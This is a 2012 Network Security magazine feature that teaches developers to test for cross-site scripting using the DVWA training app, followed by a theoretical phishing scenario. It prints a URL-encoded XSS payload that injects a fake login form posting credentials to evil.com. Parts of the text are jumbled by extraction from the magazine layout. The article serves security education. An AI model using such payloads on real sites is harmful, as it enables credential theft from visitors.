FEATURE

Caught in the cross-site scripting fire Andrew Mason

Andrew Mason, RandomStorm Programming is back on the curriculum. The goal of the Raspberry Pi Foundation is to promote computing education by taking children back to the basics of programming computers and to “foster a renaissance in coding”, in the words of Raspberry Pi Foundation’s director, Eben Upton.1,2 To facilitate this, the Foundation has developed a fully functioning computer that retails for just $25. While this drive to get programming onto the national curriculum is laudable, as penetration testers will tell you, one of the issues they frequently encounter is the gap between the ability to program and the knowledge of how to program securely. This article will examine some of the techniques used by security researchers to test common web platforms for vulnerabilities that could be exploited by malicious hackers and cyber-criminals. Many web application vulnerabilities can be searched automatically using underground hacking tools. For the purposes of this article, we will be using the Damned Vulnerable Web App (DVWA) tool, developed by security researcher and ethical hacker Ryan Dewhurst to provide a legal platform for teaching developers and security researchers about common vulnerabilities. We will then provide a fictitious example of a common vulnerability, to demonstrate how slipshod application development can put businesses and their customers at risk of privacy breaches, identity theft and fraud.

disclosure of an information security breach within 24 hours and the introduction of fines amounting to 2% of an organisation’s global turnover if customer databases are compromised.3,4 As the web is the main vector for attacks on company databases and intellectual property, this is a good time to reassess the importance of secure web application development.

Using the DVWA The DVWA is a free PHP/MySQL web application that contains many of the common vulnerabilities that hackers and cyber-criminals seek to exploit.5 It was developed by Dewhurst to provide a way of teaching application developers about

the common programming mistakes that allow malicious code to be inserted into strings, making the application unsafe for users. DVWA also serves as a training tool for security professionals, to help them hone their penetration testing skills in a legal environment. The web app can also be used in classrooms as part of a computer science and cybersecurity course to show students how to test for Cross-Site Scripting (XSS), file inclusion, SQL injection, brute force attacks or how to upload exploit vulnerabilities within web applications. As its name suggests, DVWA is indeed ‘damned vulnerable’ and it should therefore never be uploaded to a live web server, as it will be hacked. It’s recommended that you download and install XAMPP – a distribution of the Apache web server that also includes MySQL, PHP, Perl and a number of other libraries and tools – onto a local

“As the web is the main vector for attacks on company databases and intellectual property, this is a good time to reassess the importance of secure web application development” This is an important issue for all organisations. Proposed changes to European data protection laws call for

May 2012

Figure 1: The input field that is going to be attacked.

Network Security

5

FEATURE today. This has been borne out in vulnerability testing by penetration testers who also take part in voluntary disclosure programmes to help improve the security of public web platforms.

“A recent survey found that 90% of webmasters were not aware that their sites had been compromised”

Figure 2: Innocent input entered to see how it is subsequently used.

Figure 3: The HTML of the resulting page.

machine and that the DVWA is only ever run on a test machine on your local area network.6 Further details on downloading and running the DVWA tool can be read on the DVWA wiki and Dewhurst has also created an installation video.7,8

Exploiting XSS The Open Web Application Security Project (OWASP) is a not-for-profit organisation set up to improve the security of applications.9 OWASP has acknowledged that XSS is the most common security flaw found in websites

Figure 4: Injecting HTML into the input. The text is returned in bold showing that injection has worked.

6

Network Security

It is important to remove XSS vulnerabilities from websites, because they can be maliciously exploited to steal cookies, hijack user accounts, execute ActiveX and Flash content, or to redirect visitors to scam websites that launch phishing attacks. Examples of organisations’ websites that have been compromised using these methods include the BBC 6 Music and 1Xtra websites, which were used to host a drive-by download attack to infect visitors’ computers with the Phoenix Trojan, and the Sun newspaper website, which was hacked by LulzSec and displayed a false story that Rupert Murdoch had died.10,11 XSS vulnerabilities can also be used to insert malicious code into websites, without the owner’s knowledge. A recent survey undertaken by anti-malware vendor Commtouch found that 90% of webmasters were not aware that their sites had been compromised, even though they were being used to send spam, host phishing sites and to execute drive-by download attacks on site visitors.12 Once malware from a compromised website has been executed on a user’s computer, hackers and cyber-criminals can exploit this in a number of ways, such as initiating unauthorised activity on your hard disk and altering, spying on, stealing or deleting your data. And as Commtouch found in its webmaster survey, it is not easy to spot when your site has been compromised.13 Hackers use tactics such as inserting infected iframes, which look like normal pictures on the web page, but which can be used to initiate drive-by downloads of malware to visitors’ computers. This sort of activity can get your site blacklisted so it’s important to scan for vulnerabilities and remove them.

May 2012

FEATURE However, as we can see from security researchers posting vulnerabilities to the XSSed website, XSS vulnerabilities are still routinely discovered, even on the largest organisations’ websites.14 This indicates that their web developers still do not understand the potential impact on site visitors if their applications and web pages contain an XSS vulnerability.

Figure 5: The HTML showing the injected tags.

“The main cause of vulnerabilities on public web platforms is that web developers are paid to create working sites and applications as quickly as possible, but they are not security experts” The main cause of vulnerabilities on public web platforms is that web developers are paid to create working sites and applications as quickly as possible, but they are not security experts. Therefore, they don’t necessarily know how to follow OWASP best practice when developing web applications, or how to test whether their code is vulnerable to XSS attacks. That’s why the work of voluntary web application testers is so important for improving safety for all web users.

Testing for web application vulnerabilities Figures 1-8 show a demonstration, carried out by RandomStorm’s senior security engineer Robin Wood, of how to use DVWA to check for a web application for XSS vulnerability. Figure 1 shows the input field we’re going to attack. In Figure 2, we enter some innocent input to see where it is reflected back. In this case we use the word ‘Test’. Figure 3 shows how this looks in the resulting HTML. Now we’re going to see if we can inject some HTML. In Figure 4, we enter Test and see if the message comes back in bold – and it does, proving we have HTML injection. Figure 5 shows the resulting HTML. In Figure 6, we see if we can inject JavaScript with the standard basic attack

May 2012

Figure 6: Trying injection again, this time with JavaScript. The pop-up shows it worked.

Figure 7: Viewing the page’s HTML, showing inserted JavaScript.

Figure 8: Using JavaScript to create a login form.

Figure 9: A theoretical attack against a social networking site.

Network Security

7

FEATURE code of . If this works we will see a popup box containing the message XSS – and indeed it does work, showing that we can inject JavaScript. Figure 7 again shows the HTML. Most testers stop here, having shown that there’s a code injection vulnerability that could lead to XSS. But to demonstrate the full effect, let’s use JavaScript to rewrite the page to include a login box, rather than the current input field. The JavaScript used here is: getElementsByTagName(‘div’) [5].innerHTML%3D’

Please Login

User
Passwor d
‘%3B<%2Fscript>

In Figure 8, all the input is included in the querystring so the previous example becomes the following URL: http://192.168.56.101/vulnerabilities/xss_r/?name=%3Cscr ipt%3Edocument.getElementsB yTagName%28%27div%27%29[5]. innerHTML%3D%27%3Ch1%3EPlease%20 Login%3C/h1%3E%3Cform%20 action=%22http://evil. com%22%3EUser%3Cinput%20name=%22 username%22%3E%3Cbr%3EPassword%3 Cinput%20type=%22password%22%20 name=%22password%22%3E%3Cbr%3E% 3Cinput%20type=%22submit%22%20 value=%22login%22%3E%3C/ form%3E%27%3B%3C%2Fscript%3E#

If this vulnerability is present on a site that people trust, they will receive a URL that is for the site they trust. If it is over HTTPS, then it will still be over HTTPS and the padlock and certificate will be intact, as all the content is being served from the hacked site.

discovering and reporting a security vulnerability on eBay to the online auction website.15 He has also been named among the Twitter White Hats and has been credited for his work in the Microsoft Security Response Centre and the Google Hall of Fame.16,17,18 This demonstration uses an XSS test that a web application security researcher could apply to a popular social networking site, such as Facebook, that has a large number of users. Even if these hacks do not lead to online banking theft or identity fraud, the sheer number of users on such sites can be extremely lucrative for clickjackers and likejackers, who are paid for the number of people redirected to a client’s site or advertisement.20 This theoretical example shows how hackers, once they have discovered an XSS vulnerability, might use it to redirect Facebook users to a fraudulent website, run by cyber-criminals. A user would see “Facebook under construction. Click here”. Most web users would be wise enough to see through this ruse and avoid clicking the link. However, for the sake of this example, if visitors were tricked into clicking on the link, they could be taken to a phishing site, posing as Facebook. From that URL, hackers can redirect people to their own phishing site and use this to gather information such as passwords, dates of birth and other information that would assist hackers in perpetrating identity fraud. This is not an easy exploit to perpetrate. However, when combined with social engineering, such as researching people’s interests on Google and Facebook and sending a message, or email, enticing them to click on a link promising a video on their favourite sport or hobby, then this could certainly lead to a hack.

Another demonstration

Vulnerabilities created by plug-ins

Another simple demonstration of XSS weaknesses has been put together by Avram Marius Gabriel, one of RandomStorm’s web application security researchers. He was responsible for

When it comes to browser security, plug-ins such as Java, Flash, QuickTime and Firefox extensions serve as an important vector for compromising systems because they often operate on

8

Network Security

systems at a higher privilege level than the browser itself.21 It is easier for hackers to write an exploit for Java, Adobe, Flash or ActiveX because these plug-ins extend the functionality of the browser on the PC, providing an effective backdoor into the system. It is also extremely difficult to sandbox plug-ins, without disrupting functionality. As a result, plug-ins provide another popular way for hackers to gain control of websites. Dewhurst has developed an application to assist webmasters: WPScan checks WordPress for plugins that could be used by hackers as a backdoor to a blog or website. As the most popular blogging platform, WordPress is an attractive target to hackers seeking to infect a large user base. For example, early in 2012, M86 Security Labs noticed a large-scale compromise of WordPress 3.2.1 that affected 400 websites by redirecting visitors to the Phoenix exploit kit.22

“It is easier to code than it is to code securely. Even the largest companies rely on voluntary disclosure programmes to identify and close vulnerabilities” WPScan is a black box tool developed using the Ruby programming language, is available as a free download and was also added to the BackTrack catalogue in September 2011.23,24 BackTrack is an open source operating system that provides security consultants around the world with an array of digital forensics and penetration testing tools that assist them in finding and remedying security flaws in company networks, websites and applications. Tools are grouped into categories, including: vulnerability assessment, stress testing, reverse engineering, forensics and reporting.

Conclusion As we have attempted to demonstrate in this article, it is easier to code than it is to code securely. Even the largest companies rely on voluntary disclosure

May 2012

FEATURE programmes to identify and close vulnerabilities in their web-facing applications. There are currently a great many more web application developers than there are security experts. However, through a combination of the work of organisations such as OWASP, improved education of the developer community, voluntary security research and disclosure programmes and greater public awareness of hackers’ tactics, leading to safer online behaviour, one would hope to see a gradual improvement in web security over time. When predicting the future of web security, we could use the analogy of the development of the automobile industry during the past century. As technology enabled faster cars, there were a lot of accidents before the manufacturers and the general public started to understand how to improve road safety. As our public education system embraces programming as a core skill and as more security experts support the educational work of organisations such as OWASP, we hope that this will encourage future developers to put security at the heart of coding, without impeding everyday Internet use.

About the author Andrew Mason is the co-founder and technical director at RandomStorm (www.randomstorm.com), a provider of security consultancy and vulnerability scanning services to private and public sector organisations. He is a Qualified Security Assessor (QSA) for PCI DSS, a Cisco CCIE, CISSP and CESG CHECK Team Leader and has authored several books on Cisco network and Internet security. RandomStorm is a PCI Approved Scanning Vendor and Qualified Security Assessor as well as a government CHECK scheme-approved company.

References 1. ‘Raspberry Pi: about us’. Raspberry Pi Foundation. Accessed May 2012. www.raspberrypi.org/about. 2. ‘Raspberry Pi $25 Linux Computer Now in Production (Video)’. Interview with Foundation’s

May 2012

director, Eben Upton. Slashdot, 17 Jan 2012. Accessed May 2012. http://hardware.slashdot.org/ story/12/01/17/0014220/raspberrypi-25-linux-computer-now-inproduction-video. 3. ‘European Commission proposes a comprehensive reform of the data protection rules’. EU Europa, 25 Jan 2012. Accessed May 2012. http:// ec.europa.eu/justice/newsroom/dataprotection/news/120125_en.htm. 4. Pignal, Stanley; Palmer, Maija. ‘New EU privacy rules worry business’. Financial Times, 22 Jan 2012. Accessed May 2012. www.ft.com/cms/s/2/e14f2f3e44f3-11e1-be2b-00144feabdc0. html#axzz1kMtOllOk. 5. Damned Vulnerable Web App. Accessed May 2012. www.dvwa. co.uk. 6. XAMPP. Accessed May 2012. www. apachefriends.org/en/xampp.html. 7. DVWA Wiki. Accessed May 2012. http://code.google.com/p/dvwa/wiki/ README. 8. Dewhurst, Ryan. ‘Damned Vulnerable Web App Installation’. YouTube, 25 May 2009. Accessed May 2012. www.youtube.com/ watch?v=GzIj07jt8rM. 9. Open Web Application Security Project (OWASP). Accessed May 2012. https://www.owasp.org. 10. Goodin, Dan. ‘Hacked BBC streaming websites serve up malware’. The Register, 15 February 2011. Accessed May 2012. www.theregister. co.uk/2011/02/15/bbc_driveby_ download/. 11. ‘Lulz Security hackers target Sun website’. BBC News, 19 July 2011. Accessed 2012. www.bbc.co.uk/ news/uk-14196327. 12. ‘Compromised Websites: An Owner’s Perspective’. Commtouch, February 2012. Accessed May 2012. www. commtouch.com/compromisedwebsites-report-2012. 13. ‘Webmasters are often clueless when sites are hacked, survey finds’. InfoSecurity, 1 March 2012. Accessed May 2012. www. infosecurity-magazine.com/ view/24269/webmasters-are-often-

clueless-when-sites-are-hackedsurvey-finds/ 14. XSSED. Site listing websites where security researchers have discovered XSS vulnerabilities. Accessed May 2012. www.xssed.com. 15. ‘Responsible Disclosure Acknowledgement’. eBay. Accessed May 2012. http:// pages.ebay.com/securitycenter/ ResearchersAcknowledgement.html. 16. ‘Security at Twitter’. Twitter White Hats. Accessed May 2012. https:// twitter.com/about/security. 17. ‘Security Researcher Acknowledgments for Microsoft Online Services’. Microsoft Security TechCenter. Accessed May 2012. http://technet.microsoft.com/en-us/ security/cc308589. 18. Google Security Hall of Fame. Accessed May 2012. www.google. com/about/corporate/company/ halloffame.html. 19. Greene, Jay. ‘Facebook and Washington State sue alleged likejackers’. CNET, 26 January 2012. Accessed May 2012. http://news. cnet.com/8301-1023_3-5736693093/facebook-and-washington-statesue-alleged-likejackers/. 20. Chechick, Daniel. ‘Massive compromise of WordPress-based sites’. M86 Security Labs blog, 30 January 2012. Accessed May 2012. http://labs.m86security. com/2012/01/massive-compromiseof-wordpress-based-sites-but%E2%80%98everything-will-befine%E2%80%99/. 21. Bradbury, Danny. ‘The battle of the Internet browsers’. Infosecurity, 27 May 2010. Accessed May 2012. www.infosecurity-magazine.com/ view/9761/the-battle-of-the-Internetbrowsers/. 22. Dewhurst, Ryan. Ethicalhack3r blog. Accessed May 2012. http://www. ethicalhack3r.co.uk. 23. BackTrack website. Accessed May 2012. www.backtrack-linux.org. 24. ‘Information for Security Researchers’. Facebook, responsible disclosure policy and list of researchers. Accessed May 2012. www.facebook.com/whitehat.

Network Security

9